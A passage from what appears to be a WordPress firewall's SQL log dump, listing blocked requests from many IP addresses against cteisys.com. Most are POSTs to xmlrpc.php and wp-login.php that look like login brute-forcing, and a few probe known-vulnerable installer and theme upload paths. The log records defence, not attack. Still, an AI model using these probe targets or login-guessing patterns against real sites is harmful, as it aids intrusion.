Firefox\\/50.0\"}','ejFBlmZaTq41s0WKCGkyRIDQ',0,1664934515.9056,7387,'','POST',403,0,515,0,1,'',0),('194.27.156.245',3256589557,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','6bDkHZwj3vF7GliENsB5Jayn',0,1664934527.1578,1674,'','POST',403,0,515,0,1,'',0),('82.165.88.95',1386567775,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','zMd6RiYASs89h1ZU3qV5DPxC',0,1664934533.4985,1097,'','POST',403,0,515,0,1,'',0),('89.46.109.113',1496214897,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.157 Safari\\/537.36\"}','Hx8DKrm0EWpw3GIeuQcnXM2L',0,1664934533.8068,1033,'','POST',403,0,515,0,1,'',0),('51.38.132.211',858162387,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko\\/20100101 Firefox\\/66.0\"}','x76HbSckpGyiaODClevg0JoQ',0,1664934544.4388,575,'','POST',403,0,515,0,1,'',0),('45.61.188.225',759020769,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; Trident\\/7.0; rv:11.0) like Gecko\"}','7GCZ2KLI8WQjvi905JAHe1bx',0,1664935891.6786,458,'','POST',403,0,600,0,1,'',0),('198.98.50.216',3328324312,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.1916.153 Safari\\/537.36\"}','CzWKx4nkeLS6UuNqHQPmRypF',0,1664936502.3777,576,'','POST',403,0,600,0,1,'',0),('20.169.54.203',346633931,'','http://cteisys.com/dup-installer/main.installer.php','','{\"1\":\"\"}','mgGd3awEnLBNu8cbXCSeFWUf',0,1664936514.8330,324,'','GET',403,0,700,0,1,'',0),('184.75.223.211',3091980243,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','evOPaIjr62xiVNzSXFs5Jyk3',0,1664936714.2658,13373,'','POST',403,0,515,0,1,'',0),('80.233.239.98',1357508450,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko\\/20100101 Firefox\\/38.0\"}','vpVgLHWeyOjrlTsudif5SYMG',0,1664937007.8231,2498,'','POST',403,0,515,0,1,'',0),('87.249.43.21',1475947285,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko\\/20100101 Firefox\\/59.0\"}','G2IhnF1DMe6WNqKmlbZT5Ox8',0,1664936999.4668,10856,'','POST',403,0,515,0,1,'',0),('199.249.230.12',3355043340,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','puxl9eVXoHWAChtjzJvS358Y',0,1664937011.9684,689,'','POST',403,0,515,0,1,'',0),('119.23.185.187',1998043579,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','jM5oYQq7UVz62DftEi8KlF9A',0,1664937025.3922,622,'','POST',403,0,515,0,1,'',0),('198.71.48.115',3326554227,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','f0scIQuVwXGe6ibTdoJqxgZE',0,1664937031.9185,1095,'','POST',403,0,515,0,1,'',0),('148.153.64.181',2493071541,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','h1L7WwigmPEjIbneJdVXafUM',0,1664937031.9250,1093,'','POST',403,0,515,0,1,'',0),('43.129.81.132',729895300,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','jghvtWLfl0Ex2DZICPaSKGr9',0,1664937040.7438,540,'','POST',403,0,515,0,1,'',0),('15.161.131.84',262243156,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A102U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','yj1c2sKV86tM4DYhQ7AiOWfp',0,1664937048.3624,2056,'','POST',403,0,515,0,1,'',0),('198.46.93.129',3324927361,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko\\/20100101 Firefox\\/60.0\"}','D7fwiO49ZR0CN6WEuvFJSKLd',0,1664937051.3688,504,'','POST',403,0,515,0,1,'',0),('185.206.225.51',3117343027,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','St2UbXoxe9kA3rjuMqJwOBY8',0,1664938316.9141,18207,'','POST',403,0,515,0,1,'',0),('185.189.112.27',3116199963,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','VD6n7vLc5NsybaiK9fB3teqE',0,1664938930.3564,18950,'','POST',403,0,515,0,1,'',0),('194.38.20.161',3257275553,'','http://cteisys.com/wp-content/themes/DailyDeal/monetize/upload/upload.php','','{\"1\":\"ALittle Client\"}','NyDdKxFq1kZBhTLP2gol4WXM',0,1664939429.0372,11449,'','GET',403,0,700,0,1,'',0),('213.152.162.94',3583550046,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','l7FEniyPXBAcobtguqNv28pT',0,1664940072.8408,18459,'','POST',403,0,515,0,1,'',0),('82.102.27.195',1382423491,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','WFztQ9Xw5rGjhY6AJTyPIsdC',0,1664940097.5074,485,'','POST',403,0,515,0,1,'',0),('116.203.66.97',1959477857,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','z2PAZTirxkCNhfpwE3uon0Ha',0,1664940566.8405,589,'','POST',403,0,515,0,1,'',0),('198.98.49.240',3328324080,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10.7; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','1SDIWKwxYUioRzBVgdbst50H',0,1664940604.8100,1889,'','POST',403,0,600,0,1,'',0),('128.199.60.194',2160540866,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','mVuIFd3laJorpLDqXEC0NP8W',0,1664940820.5653,17385,'','POST',403,0,515,0,1,'',0),('185.142.157.57',3113131321,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','MhwL26HzAfbFVJpStdB8kjZs',0,1664940829.3852,8610,'','POST',403,0,515,0,1,'',0),('35.197.84.101',600134757,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','LroEcvCs0hnRb2KDGdS7tUPy',0,1664940991.6955,1231,'','POST',403,0,515,0,1,'',0),('52.136.249.235',881392107,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','nuZYFMx4WGEHRkOrpjsNoU6B',0,1664940993.5877,500,'','POST',403,0,515,0,1,'',0),('47.94.219.115',794745715,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','AdwmOa0CBUnq7Y3L4KPlHSXs',0,1664940998.5452,557,'','POST',403,0,515,0,1,'',0),('81.88.53.41',1364735273,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko\\/20100101 Firefox\\/63.0\"}','3RstmCOlIkPHBM2y7D1nu0z8',0,1664941002.5292,540,'','POST',403,0,515,0,1,'',0),('128.199.211.78',2160579406,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','Xhd3PwEroximyAfQztFlBMY8',0,1664941007.9406,1264,'','POST',403,0,515,0,1,'',0),('81.88.52.166',1364735142,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.190 Safari\\/537.36\"}','DPBy2ur0m4qghaX3MJtNY9e8',0,1664941007.7098,2470,'','POST',403,0,515,0,1,'',0),('185.210.145.8',3117584648,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','roUwZC0bk1GdIVEtaBf8ONFv',0,1664941009.9034,793,'','POST',403,0,515,0,1,'',0),('107.180.241.146',1807020434,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','f8WKHokpQTilNaLIXvycGUtY',0,1664941083.7761,1393,'','POST',403,0,515,0,1,'',0),('46.37.175.140',774221708,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','HsGmtSjaIfwYZ8n2v9MdqTol',0,1664941097.3096,522,'','POST',403,0,515,0,1,'',0),('51.79.19.15',860820239,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Sgzf0cmt7nF8BLE3TIiwPGeK',0,1664941327.4964,1554,'','POST',403,0,515,0,1,'',0),('198.199.81.163',3334951331,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','gDacE8GzIb7XPthodq6rYsFx',0,1664941338.3672,553,'','POST',403,0,515,0,1,'',0),('101.99.90.175',1701010095,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','bmMrfjdO1gUsnIV7tAhGSi50',0,1664941585.6016,929,'','POST',403,0,515,0,1,'',0),('35.195.135.67',600016707,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','0Q6u4DCoP27ThaWycAZtjf1b',0,1664941606.4390,1239,'','POST',403,0,515,0,1,'',0),('91.214.169.69',1540794693,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','rQcy1V2u8kPzsmnEfGIZbaOC',0,1664941847.1568,1296,'','POST',403,0,515,0,1,'',0),('51.210.99.98',869426018,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','nDP2GcCzlo5TRdNxEqwe9LtZ',0,1664942111.8981,2453,'','POST',403,0,515,0,1,'',0),('185.104.44.58',3110612026,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Dcf93v5HMp1r6GmSwunVqRzN',0,1664942095.5273,18829,'','POST',403,0,515,0,1,'',0),('173.249.29.54',2918784310,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','8MlHeuTR70GCI4BsWdFfhQVw',0,1664942332.2399,1531,'','POST',403,0,515,0,1,'',0),('83.143.116.3',1401910275,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','OEglmRKdj32ALshXB7pq5Iub',0,1664942587.7017,1498,'','POST',403,0,515,0,1,'',0),('162.241.24.182',2733709494,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','qYuDRB9jc0A7QOvtdbe8XTSn',0,1664942594.4082,724,'','POST',403,0,515,0,1,'',0),('104.244.77.192',1760841152,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit\\/537.76.4 (KHTML, like Gecko) Version\\/7.0.4 Safari\\/537.76.4\"}','4ZzQfiaRSmt1c2UpNTXwAsrn',0,1664942668.8963,640,'','POST',403,0,600,0,1,'',0),('101.0.73.142',1694517646,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','iENUXKQhIDWrC81tfxVTMebZ',0,1664942808.9100,1953,'','POST',403,0,515,0,1,'',0),('95.167.178.158',1604825758,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','lMT5n3P6YEW9mSbKXsozVcyJ',0,1664942840.5985,534,'','POST',403,0,515,0,1,'',0),('128.199.21.138',2160530826,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','8LTBvuUcsWmzF0ZQqrCAedg5',0,1664943056.9954,1466,'','POST',403,0,515,0,1,'',0),('162.219.250.15',2732325391,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','PZaiQU9w7TrucMCDGh0lv43e',0,1664943066.3455,625,'','POST',403,0,515,0,1,'',0),('51.210.53.165',869414309,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','qP90DyGsR6CF4YLcNnSEZmIj',0,1664943327.4093,1620,'','POST',403,0,515,0,1,'',0),('161.35.205.6',2703478022,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','LpMNQJdEC8y6h2OobK0muxSF',0,1664943580.3251,1468,'','POST',403,0,515,0,1,'',0),('162.241.120.248',2733734136,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','rl9Z3dEA0cXBPyL6jpKbask1',0,1664943593.9299,1582,'','POST',403,0,515,0,1,'',0),('186.234.80.195',3135918275,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','AZuKPQSzCV1Lc7HOdyvsFbpW',0,1664943840.6712,1891,'','POST',403,0,515,0,1,'',0),('54.39.216.101',908580965,'','https://cteisys.com//xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4240.193 Safari\\/537.36\"}','vCOm4DTpEFLtlq5xQRHVP7YG',0,1664944080.5527,1331,'','POST',403,0,515,0,1,'',0),('131.72.236.73',2202594377,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','DWVQLvKhFsO2GcPJSAxd49Ej',0,1664944118.8919,516,'','POST',403,0,515,0,1,'',0),('31.210.66.35',533873187,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','pOS75Kfet6zluDaVAIFY18oJ',0,1664944143.3677,1334,'','POST',403,0,515,0,1,'',0),('178.124.210.118',2994524790,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ZBPwyY1LfzphdtQ9FMaxn8RV',0,1664944420.8196,10122,'','POST',403,0,515,0,1,'',0),('190.169.30.9',3198754313,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','8dDseRYfBmNCtAMnhrT0c7ia',0,1664944720.1549,1969,'','POST',403,0,515,0,1,'',0),('162.241.120.248',2733734136,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','QApSEHq5bPYOV8Wxmrz97ZKC',0,1664944729.4390,1281,'','POST',403,0,515,0,1,'',0),('198.98.50.216',3328324312,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit\\/537.76.4 (KHTML, like Gecko) Version\\/7.0.4 Safari\\/537.76.4\"}','E9UmaTYiJn3OfHwSN6lxrWz7',0,1664944862.3069,863,'','POST',403,0,600,0,1,'',0),('180.211.99.217',3033752537,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Itp80Q3GSuVszfO27BLMZ95m',0,1664945043.2394,1622,'','POST',403,0,515,0,1,'',0),('150.230.247.143',2531719055,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','YdSCwlextEKc7ukPQfq6yOX3',0,1664945645.4182,18229,'','POST',403,0,515,0,1,'',0),('194.233.89.214',3270072790,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ZyB3v1qETMIG4OYfm5jUra2h',0,1664945645.3828,18330,'','POST',403,0,515,0,1,'',0),('35.219.66.183',601572023,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','huUXHnvgRF296f5A0QrOKTMm',0,1664945966.4119,18443,'','POST',403,0,515,0,1,'',0),('87.248.153.52',1475909940,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','sb4cLEApRln2S5GrvPzN9TaZ',0,1664945987.6346,1358,'','POST',403,0,515,0,1,'',0),('199.188.207.230',3351039974,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','9RmB38VcMFEPuNUxHhzI4gfX',0,1664946311.6176,10788,'','POST',403,0,515,0,1,'',0),('192.99.34.140',3227722380,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','j5pSeyVtxwcLHgNZ36aEARDz',0,1664946980.9454,18792,'','POST',403,0,515,0,1,'',0),('46.101.117.50',778401074,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','FZA6mJ3tcsrYnIOuMVe2yPLl',0,1664946985.8053,13934,'','POST',403,0,515,0,1,'',0),('35.198.25.12',600185100,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','K5rHpOkhwc3tx4QYbiM2Wjs8',0,1664947321.6015,17836,'','POST',403,0,515,0,1,'',0),('185.183.122.143',3115809423,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','XgP5eNOB8ZrcnlYxmMTyHUfd',0,1664947329.6591,9841,'','POST',403,0,515,0,1,'',0),('37.187.24.159',633018527,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','xKXgq4I5QAz2RcDyTEMZ93vH',0,1664947669.2883,18341,'','POST',403,0,515,0,1,'',0),('209.141.48.210',3515691218,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit\\/537.77.4 (KHTML, like Gecko) Version\\/6.1.5 Safari\\/537.77.4\"}','Koa2tBpm6Av9lEWx0ziRZsfh',0,1664947989.5937,1273,'','POST',403,0,600,0,1,'',0),('184.168.125.241',3098050033,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','QSt0Y6ra8D3sACFbnGw7liEz',0,1664947993.0394,1653,'','POST',403,0,515,0,1,'',0),('130.61.143.194',2185072578,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','TXszZbC6Ux8w2Rm3P1krAcde',0,1664948365.7463,18358,'','POST',403,0,515,0,1,'',0),('185.189.112.19',3116199955,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','tcyDdQwEqfZA89vKVaL1lTkx',0,1664948384.1495,588,'','POST',403,0,515,0,1,'',0),('101.99.95.162',1701011362,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','8nWcxtrQ97yAzS6sDoXuhbkH',0,1664948697.6062,11390,'','POST',403,0,515,0,1,'',0),('185.46.121.66',3106830658,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','XJOz5wNbhlSix4Ynr3W6DesH',0,1664948710.6404,548,'','POST',403,0,515,0,1,'',0),('209.141.57.9',3515693321,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','30VIuihNaA4PSxDC9ekZyMB1',0,1664948740.0753,13471,'','POST',403,0,600,0,1,'',0),('198.98.49.240',3328324080,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit\\/600.1.3 (KHTML, like Gecko) Version\\/8.0 Safari\\/600.1.3\"}','X0adDScY7P8THxOAFNEegKVl',0,1664948849.4184,15529,'','POST',403,0,600,0,1,'',0),('72.34.62.119',1210203767,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','1o4p3VsLPEmcTZt0qOrzWgUI',0,1664949029.5624,20376,'','POST',403,0,515,0,1,'',0),('103.152.164.156',1738056860,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','S7BUwkuTFY3Gx85th6j4beHR',0,1664949050.2541,5839,'','POST',403,0,515,0,1,'',0),('87.106.229.31',1466623263,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Nu4zJXScr1PwA3mHL8nyTE5K',0,1664949388.0751,2678,'','POST',403,0,515,0,1,'',0),('20.109.101.102',342713702,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','w035MbXGjIHktTiDCvrulaxY',0,1664949419.1609,1257,'','POST',403,0,515,0,1,'',0),('194.233.67.171',3270067115,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','XmEZg6rO7Ih92YuFn4falWkA',0,1664949760.0683,19106,'','POST',403,0,515,0,1,'',0),('162.215.217.77',2732054861,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ex8DZzRgcWYAfpl7GtUjNdyC',0,1664950117.2987,1664,'','POST',403,0,515,0,1,'',0),('103.121.90.150',1736006294,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','IjvTEXLaqxoP1NWuM8GZK5Sz',0,1664950126.6031,1590,'','POST',403,0,515,0,1,'',0),('213.152.187.205',3583556557,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','jC5pDrhJIuGq0n4YL8NEi6RW',0,1664950336.2859,19020,'','POST',403,0,515,0,1,'',0),('82.165.184.76',1386592332,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','7K0oXxgTtyBGALQ8mRSPUhkp',0,1664950488.6541,12393,'','POST',403,0,515,0,1,'',0),('188.212.34.36',3168018980,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','05TzBhXCEH3jSnPtdLFfGceM',0,1664950482.4443,18603,'','POST',403,0,515,0,1,'',0),('147.139.178.177',2475406001,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','5xpqEujYNnw8rZhS692WPT07',0,1664950826.7237,18592,'','POST',403,0,515,0,1,'',0),('148.72.209.0',2487800064,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) 